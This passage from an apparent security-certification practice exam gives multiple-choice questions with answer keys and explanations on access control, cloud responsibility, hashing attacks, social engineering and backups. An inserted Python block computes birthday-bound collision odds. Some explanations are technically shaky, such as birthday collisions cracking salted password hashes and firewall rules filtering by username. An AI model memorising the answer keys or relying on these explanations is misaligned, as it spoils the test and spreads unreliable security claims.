An inbound rule that only allows traffic from authorized IP addresses to the human resources database

Explanation

Although an inbound rule is generally the right approach, restricting access based on IP addresses is less effective than filtering by usernames. IP addresses can change, be spoofed, or be shared across multiple users, which makes this rule less secure and less aligned with the organization’s aim to control access based on specific employees. Using usernames directly provides a more robust, user-centric access control mechanism.

An outbound rule that only allows traffic from the internal network to the human resources database

Explanation

This rule is incorrect because an outbound rule typically controls traffic leaving a network or system, not inbound access. While this rule would permit data flow from the network to the HR database, it does not provide specific user-level access control. The organization’s goal is to restrict access to certain employees, which this outbound rule fails to enforce.

Overall explanation

4.5 Given a scenario, modify enterprise capabilities to enhance security.

The network team should implement an inbound rule that only allows traffic from authorized usernames to the human resources database, so that only authorized employees may access the database. Allowing traffic only from authorized IP addresses may seem secure; however, spoofing techniques or unauthorized individuals using authorized devices may still lead to access breaches.

Domain

4.0 Security Operations

Question 43Skipped

A real estate association is migrating its on-premises infrastructure to a cloud service provider. Considering the cloud responsibility matrix, who is responsible for the configuration of user groups, access control and security policies in the cloud environment?

Correct answer

Cloud Customer

Explanation

The Cloud Customer is responsible for configuring user groups, access control, and security policies in the cloud environment. This includes setting up user permissions, defining access levels, and implementing security measures to protect data and resources.

Cloud Service Provider

Explanation

The Cloud Service Provider is responsible for providing the infrastructure, hardware, and software components of the cloud environment. However, the configuration of user groups, access control, and security policies is typically the responsibility of the Cloud Customer.

Cloud Auditor

Explanation

The Cloud Auditor is responsible for assessing and evaluating the security controls and compliance of the cloud environment. They do not have direct responsibility for configuring user groups, access control, and security policies in the cloud environment.

Cloud Architect

Explanation

The Cloud Architect is responsible for designing and planning the overall structure and architecture of the cloud environment. While they may provide input on security best practices and recommendations, the actual configuration of user groups, access control, and security policies falls under the responsibility of the Cloud Customer.

Overall explanation

3.1 Compare and contrast security implications of different architecture models.

The cloud customer is responsible for configuring security groups, firewalls, and access control lists (ACLs) that control the flow of traffic within the cloud environment. The cloud service provider may provide the infrastructure and tools, however, it is up to the cloud customer to set the security measures and define who should have access to the data.

Domain

3.0 Security Architecture

Question 44Skipped

How can scripting help a system administrator comply with security policies by disabling user accounts of employees who have left the organization?

Regulating security awareness to employees about the disabling processes

Explanation

Regulating security awareness to employees about the disabling processes is important for overall security hygiene, but it does not directly address the need for automated account disabling. While educating employees on security practices is crucial, scripting provides a more efficient and reliable solution for enforcing security policies.

Manually disabling the user accounts through a console interface

Explanation

Manually disabling user accounts through a console interface is a time-consuming and error-prone process for a system administrator. It does not ensure consistency in enforcing security policies and increases the likelihood of human error, potentially leading to security vulnerabilities.

Segregating the network of working employees and departed staff

Explanation

Segregating the network of working employees and departed staff is a network security measure that can help limit access to resources, but it does not specifically address the task of disabling user accounts. Scripting for automatic account disabling is a more direct and effective approach to ensuring compliance with security policies regarding user account management.

Correct answer

Automatically disabling the departed employee’s accounts

Explanation

Automatically disabling the departed employee’s accounts through scripting allows the system administrator to efficiently and consistently enforce security policies. By automating this process, the risk of oversight or delay in disabling accounts is minimized, enhancing overall security posture.

Overall explanation

4.7 Explain the importance of automation and orchestration related to secure operations.

Automatically disabling the departed employee’s accounts can be achieved by scripting. The technique is an efficient and consistent way to manage access control and comply with security policies.

Domain

4.0 Security Operations

Question 45Skipped

What is the likely impact of sufficient funding for a group of individuals with advanced technical hacking skills who are actively targeting the financial sector with cyberattacks?

Inability to perform zero-day attacks

Explanation

Sufficient funding would actually increase the likelihood of individuals with advanced technical hacking skills being able to perform zero-day attacks. With resources at their disposal, they would have the ability to discover and exploit previously unknown vulnerabilities before they are patched, making zero-day attacks more feasible.

Lack of motivation to launch attacks

Explanation

Sufficient funding would likely increase the motivation of individuals with advanced technical hacking skills to launch cyberattacks, rather than decrease it. With more resources at their disposal, they may feel empowered to carry out attacks more aggressively.

Reliance on open-source software for attacks

Explanation

Individuals with advanced technical hacking skills actively targeting financial sectors would not likely rely on open-source software for their attacks if they have sufficient funding. They would have the means to acquire and develop custom tools and malware tailored to their specific targets.

Correct answer

Ability to deploy sophisticated hacking tools

Explanation

With sufficient funding, individuals with advanced technical hacking skills would have the ability to invest in and deploy sophisticated hacking tools and techniques. This would enable them to conduct more advanced and potentially more damaging cyberattacks on financial sectors.

Overall explanation

2.1 Compare and contrast common threat actors and motivations.

The likely impact of sufficient funding for a group of individuals with advanced technical hacking skills is the ability to deploy sophisticated hacking tools. Since the attackers already possess an expansive skill set, substantial funding gives them the additional edge needed to perform highly sophisticated attacks using the proper tools.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 46Skipped

What should be considered by a technology firm to address security concerns during the acquisition process of new software to upgrade its network management capabilities?

Negotiations for the best price of the software

Explanation

Negotiating for the best price of the software is important for cost-effectiveness, but it does not directly address security concerns during the acquisition process. Security should be a top priority when acquiring new software to ensure the protection of the firm’s network and data assets.

Security evaluations of the vendor to accelerate the procurement process

Explanation

Security evaluations of the vendor may provide insights into the vendor’s security practices and track record, but they do not directly address the security concerns related to the specific software being acquired. The focus should be on evaluating the security features and vulnerabilities of the software itself, rather than solely relying on the vendor’s security reputation.

Compatibility of the software with the existing hardware

Explanation

While compatibility with existing hardware is important for the successful implementation of new software, it is not directly related to addressing security concerns during the acquisition process. Security considerations should focus on the software’s ability to protect the network and data, rather than its compatibility with hardware.

Correct answer

Documentation on the security features and vulnerabilities of the software

Explanation

Documentation on the security features and vulnerabilities of the software is crucial for a technology firm to assess the potential risks and benefits of integrating the new software into their network management capabilities. Understanding the security features will help in determining if the software aligns with the firm’s security requirements, while knowledge of vulnerabilities will allow for proactive measures to mitigate potential threats.

Overall explanation

4.2 Explain the security implications of proper hardware, software, and data asset management.

The technology firm should consider documentation on the security features and vulnerabilities of the software to address security concerns during the acquisition process. This ensures the organization manages the potential risks associated with the software acquisition effectively and makes informed decisions about the software it is acquiring.

Domain

4.0 Security Operations

Question 47Skipped

A government agency that deals with data on the levels of national security has implemented an information classification system. Why is the classification system essential for security?

Allows granular views of the information

Explanation

While a classification system may allow for granular views of information, the primary purpose of the system is to categorize data based on its sensitivity and apply appropriate security controls. Granular views may be a benefit of the classification system, but the main goal is to ensure that sensitive information is adequately protected.

Eliminates the need for encrypting sensitive data

Explanation

Eliminating the need for encrypting sensitive data is not a valid reason for the importance of a classification system. Encryption is a critical security measure that should be applied to sensitive information regardless of its classification level to protect it from unauthorized access.

Simplifies access control by universal assignments

Explanation

Simplifying access control by universal assignments may not be sufficient for ensuring the security of sensitive information. The classification system provides a more detailed and tailored approach to protecting data based on its sensitivity and importance.

Correct answer

Protection of information based on its sensitivity

Explanation

The classification system is essential for security because it allows for the protection of information based on its sensitivity. By categorizing data into different levels of classification, organizations can apply appropriate security measures to ensure that sensitive information is adequately protected.

Overall explanation

4.2 Explain the security implications of proper hardware, software, and data asset management.

The information classification system helps to provide protection of information based on its sensitivity. Highly sensitive information should be protected by stringent and rigorous security controls, which are technically and managerially expensive to implement. Less sensitive information can have moderate security controls.

Domain

4.0 Security Operations

Question 48Skipped

A business conglomerate stores its user passwords as hashes in an enterprise database. The security team is concerned about the possibility of successful cryptographic attacks such as birthday attacks. How would an attacker break security with such an attack?

Correct answer

Discovering a collision in the hash algorithm

Explanation

Discovering a collision in the hash algorithm refers to finding two different inputs that produce the same hash output. If an attacker can find a collision, they can potentially use it to gain unauthorized access by impersonating a legitimate user.

Sniffing passwords over insecure networks

Explanation

Sniffing passwords over insecure networks involves intercepting and capturing plaintext passwords as they are transmitted over a network. While this is a valid concern for network security, it is not directly related to cryptographic attacks like birthday attacks on hashed passwords stored in a database.

Reverse engineering the hash

Explanation

Reverse engineering the hash involves attempting to deduce the original input from the hash output. If an attacker can reverse engineer the hash function used to store passwords, they may be able to determine the plaintext passwords and gain unauthorized access.

Exploiting password complexity weaknesses

Explanation

Exploiting password complexity weaknesses is a common method for attackers to gain access to user accounts. However, in the context of cryptographic attacks such as birthday attacks, the focus is on vulnerabilities within the hash algorithm itself rather than weaknesses in user passwords.

Overall explanation

2.4 Given a scenario, analyze indicators of malicious activity.

The attacker can crack passwords using a birthday attack by discovering a collision in the hash algorithm. A collision in the hashing algorithm exists if it is possible to find two inputs that are not identical but produce the same hash when run through the hashing algorithm. This means that if the attacker manages to find a collision for the hash, they do not need to know the actual password that formed the hash to gain access but may instead use the input discovered from the hash collision. The attack gets its name from the birthday paradox, which states that only 23 people are needed for the probability of two of them sharing the same birthday to exceed 50%. With computationally capable equipment, inputs that share the same hash may be found, much like individuals that share the same birthday. This attack is thwarted by salting the passwords.
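To put numbers on the birthday paradox referenced above, here is an added example (not part of the course material) that computes the exact collision probability for a given output space, the standard closed-form approximation used when the space is a full digest length, and the sample count at which a collision becomes more likely than not; the function names are my own.

```python
"""Birthday-bound calculator: how many random inputs are needed before two of them
are likely to share an output. Added example; formulas are the standard exact
product and the usual exponential approximation."""
import math


def no_collision_probability(n: int, space: int) -> float:
    """Exact probability that n uniformly random values drawn from `space` possible
    outputs are all distinct: prod_{i=0}^{n-1} (space - i) / space."""
    if n > space:
        return 0.0  # pigeonhole: more samples than outputs guarantees a collision
    p = 1.0
    for i in range(n):
        p *= (space - i) / space
    return p


def collision_probability(n: int, space: int) -> float:
    """Exact probability that at least two of n values collide."""
    return 1.0 - no_collision_probability(n, space)


def collision_probability_approx(n: int, space: int) -> float:
    """Closed-form approximation 1 - exp(-n(n-1) / (2 * space)). Needed when the
    space is a full digest (for example 2**128) and looping over n is infeasible."""
    return 1.0 - math.exp(-n * (n - 1) / (2.0 * space))


def samples_for_probability(space: int, target: float = 0.5) -> int:
    """Smallest n for which the approximate collision probability reaches `target`.
    Solving 1 - exp(-n^2 / (2 space)) = target gives n ~ sqrt(2 space ln(1/(1-target))),
    which is the well-known ~2**(bits/2) work factor for a `bits`-bit digest."""
    return math.ceil(math.sqrt(2.0 * space * math.log(1.0 / (1.0 - target))))


def smallest_group_over_half(space: int = 365) -> int:
    """Exact smallest n with collision_probability(n, space) > 0.5 (23 for birthdays)."""
    n = 1
    while collision_probability(n, space) <= 0.5:
        n += 1
    return n


if __name__ == "__main__":
    print("people needed for >50% shared birthday:", smallest_group_over_half())
    print("exact P(23 people share a birthday):", round(collision_probability(23, 365), 4))
    for bits in (32, 64, 128, 256):
        n = samples_for_probability(2 ** bits)
        print(f"{bits}-bit digest: about {n:.3e} samples for a 50% collision chance")
```

The digest-length loop shows why a short or truncated hash output is the real exposure to this attack class: the work needed scales with the square root of the output space, not with its size.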

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 49Skipped

A security analyst has received an alert from the file integrity monitoring (FIM) system for a triggered event on a critical server. How does the FIM software help the security analyst?

To compress the large files when thresholds are reached

Explanation

Compressing large files when thresholds are reached is not a function typically performed by file integrity monitoring (FIM) software. FIM software is focused on monitoring and detecting changes to files, rather than compressing them.

To defragment the files to improve performance

Explanation

Defragmenting files to improve performance is not a function typically performed by file integrity monitoring (FIM) software. FIM software is focused on monitoring the integrity of files and detecting any unauthorized changes, rather than optimizing file performance through defragmentation.

Correct answer

To detect unauthorized changes to files in real time

Explanation

File integrity monitoring (FIM) software helps the security analyst by detecting unauthorized changes to files in real time. This is a key function of FIM software, as it allows for the immediate detection of any unauthorized modifications to critical files on servers.

To block unauthorized file transfers

Explanation

Blocking unauthorized file transfers is a function more commonly associated with data loss prevention (DLP) solutions rather than file integrity monitoring (FIM) software. FIM software is designed to monitor and detect changes to files, not necessarily to block file transfers.

Overall explanation

4.5 Given a scenario, modify enterprise capabilities to enhance security.

File integrity monitoring (FIM) software helps to detect unauthorized changes to files in real time. The FIM software alerts the IT team to changes that occur to files on the critical server, giving them the ability to investigate the validity of the change immediately in response to potential security threats.

Domain

4.0 Security Operations

Question 50Skipped

The IT team responsible for patching an operating system affected by a critical security vulnerability has encountered technical difficulties preventing them from successfully patching it. What is the proper action they should take?

Correct answer

Mitigate the vulnerability using additional security controls

Explanation

Mitigating the vulnerability using additional security controls is a proactive approach to address the security risk posed by the critical vulnerability. Implementing compensating security measures can help protect the system and its data until a successful patching solution is available. This action helps reduce the risk of exploitation and potential security breaches.

Monitor the system but do not take any further action

Explanation

Monitoring the system without taking any further action leaves the system vulnerable to potential attacks exploiting the security vulnerability. It is crucial to actively address security vulnerabilities to protect the system and its data.

Switch off the system till a working patch is available

Explanation

Switching off the system until a working patch is available may disrupt essential services and operations that rely on the system. It is not a recommended action as it can impact productivity and business continuity. It is important to explore alternative solutions to mitigate the security vulnerability.

Open a support ticket with the vendor

Explanation

Opening a support ticket with the vendor is a proactive step to seek assistance in resolving the technical difficulties encountered during the patching process. Vendor support can provide guidance, troubleshooting, and potentially a solution to successfully patch the operating system.

Overall explanation

3.1 Compare and contrast security implications of different architecture models.

The IT team should mitigate the vulnerability using additional security controls, as patching the vulnerability immediately has been deemed technically impossible. Delaying the patch process introduces the risk of exploitation, and it is therefore essential that controls to minimize such risk are implemented.

Domain

3.0 Security Architecture

Question 51Skipped

A small startup has recently expanded its services that require it to collect and store the personal information of its clients. Which of the following external considerations is important for security governance?

Tax policies and procedures

Explanation

Tax policies and procedures are essential for financial compliance and reporting requirements within a business. However, they do not specifically address the security governance concerns related to collecting and storing personal client information.

Environmental conservation regulations

Explanation

Environmental conservation regulations focus on protecting the environment and natural resources. While important for sustainability and corporate responsibility, they do not directly impact the security governance of handling personal client data.

Correct answer

Data and privacy protection laws

Explanation

Data and privacy protection laws are crucial external considerations for security governance when collecting and storing personal information of clients. Compliance with these laws ensures that the data is handled securely, confidentially, and in accordance with legal requirements to protect the privacy of individuals.

Occupational health and safety guidelines

Explanation

Occupational health and safety guidelines are important for ensuring the safety and well-being of employees in the workplace. While they are crucial for overall business operations, they are not directly related to the security governance of collecting and storing personal information of clients.

Overall explanation

5.1 Summarize elements of effective security governance.

Data and privacy protection laws are the external considerations most important for security governance. These laws govern how the organization handles and protects the personal data of individuals, define legal requirements, and impose penalties for non-compliance. They are designed to safeguard the confidentiality, integrity, and availability of individuals’ personal information.

Domain

5.0 Security Program Management and Oversight

Question 52Skipped

A company has set up standard operating procedures as part of its cybersecurity maturity program. During a cybersecurity incident, they refer to the SOPs. What is the use of the SOPs in relation to the incident response?

Providing general security guidelines to the employees

Explanation

Providing general security guidelines to the employees is typically covered in security policies and employee handbooks, rather than in standard operating procedures (SOPs). SOPs are more focused on specific processes and procedures within the organization.

Determining the length of time to restore services and operations

Explanation

Determining the length of time to restore services and operations is more related to service level agreements (SLAs) and disaster recovery plans, rather than standard operating procedures (SOPs). SOPs focus on the procedures to follow during an incident, rather than the specific timeframes for recovery.

Correct answer

Documentation of the incident response process of the organization

Explanation

Documentation of the incident response process of the organization is a key function of standard operating procedures (SOPs). SOPs outline the specific steps and actions to be taken during a cybersecurity incident, ensuring a consistent and effective response.

Specifying the consequences of violating security policies

Explanation

Specifying the consequences of violating security policies is also typically outlined in security policies and employee handbooks, rather than in standard operating procedures (SOPs). SOPs are more about the step-by-step processes to follow in specific situations.

Overall explanation

1.3 Explain the importance of change management processes and the impact to security.

Standard operating procedures (SOPs) provide documentation of the incident response process of the organization. They help the incident response team to ensure that security incidents are handled effectively and consistently. They outline the steps to follow during the incident response, the communication protocols to observe, and the roles and responsibilities of the incident responders.

Domain

1.0 General Security Concepts

Question 53Skipped

The IT team has started repairing a critical server in their data center after it experienced a hardware failure that led to a service outage. What best defines the MTTR?

The time that shall elapse before another repair is needed

Explanation

The time that shall elapse before another repair is needed is not the definition of MTTR. MTTR focuses on the time it takes to repair and restore services after a failure, not the interval between repairs.

The time taken to discover the failure

Explanation

The time taken to discover the failure is not the definition of MTTR. MTTR stands for Mean Time To Repair, which focuses on the time it takes to restore services and recover from a failure, not the time taken to identify the issue.

The total time the server operated successfully before the failure

Explanation

The total time the server operated successfully before the failure is not related to MTTR. MTTR specifically refers to the time it takes to repair and restore services after a failure, not the overall uptime of the server.

Correct answer

The time it takes to restore services and recover from the failure

Explanation

The time it takes to restore services and recover from the failure accurately defines MTTR. This metric is crucial in measuring the efficiency of the IT team in addressing and resolving hardware failures to minimize service downtime.

Overall explanation

5.2 Explain elements of the risk management process.

The mean time to repair (MTTR) is the time it takes to restore services and recover from the failure. The metric gives a measure of the efficiency of the incident response and recovery processes of an organization. A low MTTR gives an indication that the incidents are resolved quickly.

Domain

5.0 Security Program Management and Oversight

Question 54Skipped

A web application has faced a malicious attack whereby the attacker submitted an unusually large input causing the application to overwrite adjacent memory locations that eventually allowed unauthorized code to be executed. What type of vulnerability is the web application susceptible to?

SQL Injection

Explanation

SQL Injection is a type of attack where attackers insert malicious SQL statements into input fields to manipulate the database. It does not involve overwriting memory locations or executing unauthorized code, so it is not the correct vulnerability in this scenario.

Cross-Site Request Forgery

Explanation

Cross-Site Request Forgery (CSRF) is a type of attack where a malicious website tricks a user’s browser into making a request to a different website where the user is authenticated. It does not involve overwriting memory locations or executing unauthorized code, so it is not the correct vulnerability in this scenario.

Correct answer

Buffer Overflow

Explanation

Buffer Overflow is a type of vulnerability where a program writes more data to a block of memory, or buffer, than it was allocated to hold. This can lead to overwriting adjacent memory locations and potentially executing unauthorized code, making it the correct vulnerability in this scenario.

Cross-Site Scripting

Explanation

Cross-Site Scripting (XSS) is a type of vulnerability where attackers inject malicious scripts into web pages viewed by other users. It does not involve overwriting memory locations or executing unauthorized code, so it is not the correct vulnerability in this scenario.

Overall explanation

2.4 Given a scenario, analyze indicators of malicious activity.

The web application is susceptible to a buffer overflow vulnerability. The attacker’s large input exceeds the buffer’s capacity and overwrites adjacent memory locations. Buffer overflows tend to cause system crashes and unauthorized code execution.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 55Skipped

What should be the focus of a small medical clinic that aims to improve its data security to protect confidential patient information by implementing access control standards?

Conduct cybersecurity training

Explanation

Conducting cybersecurity training for employees is essential to raise awareness about security best practices and potential threats. While training is important for overall security posture, it may not specifically address the need to implement access control standards to protect patient information.

Encrypt all the data at rest and in transit

Explanation

Encrypting all data at rest and in transit is a critical security measure to ensure that patient information remains confidential and secure. While encryption is an important aspect of data security, it may not directly address the need to enforce access control policies to regulate who can access the data.

Correct answer

Enforce access control policies

Explanation

Enforcing access control policies is crucial for controlling and managing user access to confidential patient information. By implementing access control standards, the clinic can ensure that only authorized individuals have access to sensitive data, thereby enhancing data security and protecting patient privacy.

Install a firewall at the perimeter

Explanation

Installing a firewall at the perimeter is an important security measure to protect the network from external threats. While it is a crucial component of a comprehensive security strategy, it may not directly address the need to enforce access control policies to protect confidential patient information.

Overall explanation

5.1 Summarize elements of effective security governance.

The medical clinic should enforce access control policies to improve its data security and protect confidential patient information. They should develop and enforce sound access control policies and procedures that clearly specify who has access to what data and under what circumstances and conditions those access rights apply. The employees should also understand the policies and follow them.

Domain

5.0 Security Program Management and Oversight

Question 56Skipped

A systems administrator working at a bank has received an email from an unknown source with a link for a critical security update to their core banking software. What step should the administrator perform next?

Reply to the sender to ask them questions to clear any doubts

Explanation

Replying to the sender to ask questions may not be a safe practice, as it could potentially confirm the validity of the email to the attacker. It is important to avoid engaging with unknown or suspicious emails to prevent falling victim to phishing attacks.

Share the email with colleagues to see their thoughts and opinions

Explanation

Sharing the email with colleagues without verification from the cybersecurity team can potentially spread the threat further within the organization. It is important to involve the appropriate security professionals to assess the email’s legitimacy and take necessary actions to protect the bank’s systems and sensitive information.

Correct answer

Forward the email to the cybersecurity team for investigation

Explanation

Forwarding the email to the cybersecurity team for investigation is the correct step to take in this situation. The cybersecurity team can analyze the email, the link, and the potential threat posed by the update to determine if it is legitimate or a phishing attempt. This helps ensure the security of the bank’s systems and data.

Download and install the update immediately to secure the system

Explanation

Downloading and installing the update immediately from an unknown source can pose a significant security risk. It is crucial to verify the authenticity of the email and the source of the update before taking any action to prevent potential malware or phishing attacks.

Overall explanation

2.3 Explain various types of vulnerabilities.

The next step that the systems administrator should take after receiving an email from an unknown source with a link for a critical security update to their core banking software is to forward the email to the cybersecurity team for investigation. They will be able to assess the legitimacy of the email and determine if there is any security threat associated with it. Clicking on links or downloading files from unknown sources should never be done, as it could bring malware into the network and compromise the security of the systems.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 57Skipped

The security team at the IT department has implemented technical security controls to prevent unauthorized software from being installed in the corporate network. However, an application necessary for a current project needs to be installed that is flagged as unauthorized software. What should the security team do to allow the installation of this application while maintaining the current security posture?

Blacklist the application

Explanation

Blacklisting the application would involve adding it to a list of unauthorized software, which would prevent its installation. This would not allow the necessary application to be installed while maintaining the current security posture.

Disable the firewall for some time to install the application

Explanation

Disabling the firewall to install the application would weaken the network’s security posture by removing a critical security control. This action could expose the network to potential security risks and should be avoided.

Disable the antivirus for some time to install the application

Explanation

Disabling the antivirus to install the application would also compromise the network’s security by leaving it vulnerable to malware and other threats. This action is not recommended as it undermines the effectiveness of the security controls in place.

Correct answer

Whitelist the application

Explanation

Whitelisting the application would involve adding it to a list of approved software, which would allow its installation while still maintaining the current security controls. This approach ensures that only authorized applications can be installed on the corporate network.

Overall explanation

2.5 Explain the purpose of mitigation techniques used to secure the enterprise.

The security team should whitelist the application to allow its installation while maintaining the current security posture. Whitelisting of applications allows only the approved applications to be executed or run and blocks any other application that has not been defined in the whitelist. If the application needed for the current project is listed in the whitelist, it will not be flagged as unauthorized and will be allowed to install without any issues.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 58Skipped

What is the primary security concern resulting from a manufacturing company relying on a third-party logistics service provider to handle shipments of its products using an outdated inventory management system that lacks sufficient security controls?

The shipment of the products may be delayed

Explanation

While delays in product shipments can be a concern for a manufacturing company relying on a third-party logistics service provider, it is not the primary security concern in this scenario. The focus is on the security risks associated with the outdated inventory management system and potential exposure of sensitive data.

The service provider may increase the service fee

Explanation

While an increase in service fees by the logistics service provider may impact the manufacturing company financially, it is not directly related to the primary security concern of data exposure due to the outdated inventory management system. Security controls are essential to protect sensitive data, regardless of any potential changes in service fees.

Correct answer

Sensitive data in the shipment could be exposed

Explanation

The primary security concern in this scenario is that sensitive data in the shipment, such as product details, customer information, or trade secrets, could be exposed due to the outdated inventory management system lacking sufficient security controls. This exposure could lead to data breaches, unauthorized access, or theft of sensitive information.

The service provider may cancel the shipment

Explanation

The possibility of the service provider canceling the shipment is a logistical concern rather than a primary security concern in this scenario. The focus should be on the security risks associated with the outdated inventory management system and the potential exposure of sensitive data during product shipments.

Overall explanation

2.3 Explain various types of vulnerabilities.

The primary security concern of the outdated inventory management system that lacks sufficient security controls is that sensitive data in the shipment could be exposed. The outdated inventory system is subject to vulnerabilities that may be exploited and lead to data breaches or exposure of the sensitive shipment data it is handling.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 59Skipped

A large organization has faced many challenges in network flexibility and management when using traditional networking and has decided to implement SDN. What security advantage can they expect?

SDN enhances control over the network by allowing manual configuration of network policies and devices

Explanation

SDN enhances control by centralizing management, but one of its primary benefits is automation, not manual configuration. SDN allows for policies to be centrally defined and then dynamically pushed across the network, reducing human intervention and thus decreasing the chances of manual errors. Manual configuration, while still possible, is not the key advantage or purpose of SDN in improving network control or security.

Correct answer

SDN contains and responds to threats by dynamic, automated network segmentation and isolation

Explanation

SDN introduces dynamic and automated capabilities, particularly in network segmentation and isolation, which greatly enhances security. This flexibility allows the network to quickly respond to potential threats by automatically segmenting and isolating affected areas, reducing the risk of lateral movement by attackers. Additionally, SDN’s centralized control allows for rapid reconfiguration of network paths and policies in response to real-time threats, which ensures that responses are efficient and consistent.

SDN reduces the likelihood of misconfigurations by static and predefined network configurations

Explanation

SDN actually reduces misconfigurations by using dynamic, real-time configurations, not static or predefined ones. In traditional networking, static configurations often lead to misconfigurations as networks evolve, but SDN’s centralized control allows for real-time updates and adjustments. This dynamic nature is more adaptive and reduces the risk of configuration errors over time, unlike the static configurations suggested in this answer.

SDN makes it hard for attackers to attack the network by introducing additional layers of complexity in the network

Explanation

While SDN can introduce more sophisticated network structures, this does not inherently make it more difficult for attackers. The complexity of traditional networks can sometimes obscure vulnerabilities, but SDN’s strength lies in automation and flexibility rather than relying on complexity as a security mechanism. Attackers can still exploit misconfigurations or flaws in the control plane, meaning that complexity alone is not a reliable defense.

Overall explanation

3.1 Compare and contrast security implications of different architecture models.

Software-defined networking (SDN) contains and responds to threats by dynamic, automated network segmentation and isolation. SDNs use software logic to control, configure, and command the network operations. The ability of the organization to respond to security incidents is enhanced.

Domain

3.0 Security Architecture

Question 60Skipped

During a security audit performed on the network of an organization, it was discovered that many servers have open service ports that are not in use. What is the security issue with leaving these ports open?

Correct answer

Open service ports leave possible entry points for unauthorized access

Explanation

Leaving open service ports that are not in use creates potential entry points for attackers to exploit. These ports can be used as a gateway for unauthorized access to the network, leading to security breaches and data compromise.

Open service ports can slow down the network performance

Explanation

While open service ports can potentially impact network performance, the primary security concern with leaving them open is the increased risk of unauthorized access. Network performance issues can be addressed through proper network management and optimization.

Open service ports will show up in scan reports

Explanation

Open service ports that are not in use will indeed show up in scan reports, but the main security concern is not the visibility of these ports in reports. The critical issue is the security risk posed by leaving these ports open and potentially vulnerable to exploitation by malicious actors.

Open service ports may cause conflicts with other open ports

Explanation

Open service ports that are not in use may not necessarily cause conflicts with other open ports. The main security issue lies in the fact that these open ports provide opportunities for attackers to gain access to the network, rather than conflicts with other ports.

Overall explanation

2.2 Explain common threat vectors and attack surfaces.

Open service ports leave possible entry points for unauthorized access. By allowing ports that are not needed to remain open, the organization is exposed to possible security breaches, because attackers can use these ports to establish remote connections or shells for monitoring, controlling, and transferring data to and from the device.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 61Skipped

A research institution has invested in a robust multi-cloud strategy where it has deployed its services on Amazon Web Services, Microsoft Azure, Google Cloud Platform, Oracle Cloud, and IBM Cloud. What is the primary challenge that the institution may face with such a strategy?

Correct answer

Ensuring compliance and consistent policies

Explanation

Ensuring compliance and consistent policies is the primary challenge that a research institution may face with a robust multi-cloud strategy. Maintaining compliance with regulations and enforcing consistent security policies across multiple cloud platforms can be a significant challenge that requires careful planning and execution.

Limited accessibility

Explanation

Limited accessibility is not the primary challenge that a research institution may face with a robust multi-cloud strategy. In fact, multi-cloud strategies are designed to enhance accessibility by leveraging multiple cloud providers for different services.

Simple and centralized security management

Explanation

Simple and centralized security management is not the primary challenge with a robust multi-cloud strategy. Managing security across multiple cloud providers can be complex, requiring specialized tools and expertise to ensure consistent protection.

Less scalability and flexibility

Explanation

Less scalability and flexibility are not the primary challenges associated with a robust multi-cloud strategy. Multi-cloud environments are often chosen for their scalability and flexibility, allowing organizations to tailor their cloud usage to specific needs.

Overall explanation

3.4 Explain the importance of resilience and recovery in security architecture.

The primary challenge the research institution may face is ensuring compliance and consistent policies across the various cloud providers. Each cloud provider may have a unique set of security tools and configurations which makes it hard for organizations to formulate a unified and generalized security strategy that accommodates each provider.

Domain

3.0 Security Architecture

Question 62Skipped

A company was hit by a ransomware attack resulting in some servers being compromised. They have a robust backup plan that includes snapshots for all their critical servers. What is the advantage of this technique?

Snapshot backups prevent compromise by sandboxing the servers

Explanation

Snapshot backups do not prevent compromise by sandboxing the servers. While they can help in restoring servers to a clean state, they do not isolate or sandbox the servers to prevent ransomware attacks from occurring.

Snapshot backups automatically encrypt the data preventing ransomware attacks

Explanation

Snapshot backups do not automatically encrypt the data. They capture the state of the server at a specific point in time, allowing for easy restoration, but they do not provide encryption to prevent ransomware attacks.

Correct answer

Snapshot backups can restore the servers to a previously uninfected state

Explanation

The advantage of using snapshot backups is that they can restore the servers to a previously uninfected state. This means that even if the servers are compromised by a ransomware attack, the organization can roll back to a point in time before the attack occurred, minimizing the impact and potential data loss.

Snapshot backups are immune to ransomware attacks

Explanation

Snapshot backups are not immune to ransomware attacks. While they can help in restoring servers to a previous state, they are not a foolproof method to prevent ransomware attacks from occurring in the first place.

Overall explanation

3.4 Explain the importance of resilience and recovery in security architecture.

Snapshot backups can restore the servers to a previously uninfected state. Snapshots capture an image of the system at a specific point in time. With such an image being taken before the ransomware attack, its restoration can be performed after the attack to return the servers to an operational state.

Domain

3.0 Security Architecture

Question 63Skipped

The help desk analyst at a company has been socially engineered by an attacker posing as a new employee and requesting access to sensitive systems using a convincing made-up story. What type of attack technique has the attacker used?

Tailgating

Explanation

Tailgating is a physical security breach where an unauthorized person follows an authorized individual into a restricted area by closely following them. It is not relevant to the scenario where the attacker uses a fabricated story to manipulate the help desk analyst into granting access to sensitive systems.

Typosquatting

Explanation

Typosquatting is a type of attack where attackers register domain names similar to legitimate ones to deceive users into visiting malicious websites. It is not related to the scenario described in the question where the attacker manipulates the help desk analyst through a convincing story.

Correct answer

Pretexting

Explanation

Pretexting is a social engineering technique where attackers create a false scenario or pretext to manipulate individuals into providing confidential information or access. In this case, the attacker poses as a new employee with a convincing made-up story to deceive the help desk analyst into granting access to sensitive systems. This choice accurately describes the type of attack technique used in the scenario.

Spear-phishing

Explanation

Spear-phishing is a targeted form of phishing where attackers send personalized emails to specific individuals to deceive them into revealing sensitive information or performing actions. While it is a common social engineering technique, it is not the specific type of attack described in the question where the attacker poses as a new employee to gain access to sensitive systems.

Overall explanation

2.2 Explain common threat vectors and attack surfaces.

The attacker has subjected the help desk analyst to a pretexting social engineering attack. Pretexting involves the use of a made-up or fake story, known as a pretext, to trick individuals into giving up sensitive information that helps facilitate a cyberattack.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 64Skipped

A business continuity team at a research facility responsible for the protection of proprietary designs and research findings is concerned about the probable risks to such assets. Which risk is most likely to be identified in their assessment?

Competitors in the market

Explanation

Competitors are an external business risk, but they do not directly threaten the operational continuity of the research facility. Competitors may seek to develop rival products or engage in corporate espionage, but these risks are more strategic than operational. The scenario’s focus on business continuity emphasizes risks that disrupt operations, and competitors in the market are less likely to be highlighted in this specific type of risk assessment.

Regulatory changes in the industry

Explanation

